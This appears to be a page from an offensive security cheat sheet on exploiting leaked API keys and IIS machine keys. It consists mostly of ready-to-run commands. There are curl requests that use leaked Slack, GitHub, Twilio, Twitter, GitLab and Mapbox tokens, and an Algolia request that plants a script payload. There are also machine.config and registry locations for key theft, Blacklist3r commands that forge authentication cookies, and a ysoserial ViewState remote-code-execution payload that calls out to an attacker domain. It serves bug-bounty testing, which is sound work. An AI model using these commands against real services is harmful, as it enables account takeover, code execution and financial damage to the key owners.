6.8 KiB
API Key Leaks
The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
Summary
Tools
- KeyFinder - is a tool that let you find keys while surfing the web!
- Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
Exploit
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
Google Maps
Use : https://github.com/ozguralp/gmapsapiscanner/
Impact:
- Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
- Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
Slack API Token
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
Facebook Access Token
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
Twilio Account_sid and Auth token
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
Twitter Bearer Token
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
IIS Machine Keys
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Requirements
- machineKey validationKey and decryptionKey
- __VIEWSTATEGENERATOR cookies
- __VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Common locations of web.config / machine.config
- 32-bit
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
- 64-bit
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
- in registry when AutoGenerate is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
Exploit with Blacklist3r
Identify known machine key
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
Generate ViewState for RCE
NOTE: In Burp you should URL Encode Key Characters for your payload.
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
Edit cookies with the machine key
If you have the machineKey but the viewstate is disabled.
ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk
, jackpot. If it's pk
or tk
, it's not worth your time.
#Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
References
- Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019
- Private API key leakage due to lack of access control - yox - August 8, 2018
- Project Blacklist3r - November 23, 2018 - @notsosecure
- Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020
- Mapbox API Token Documentation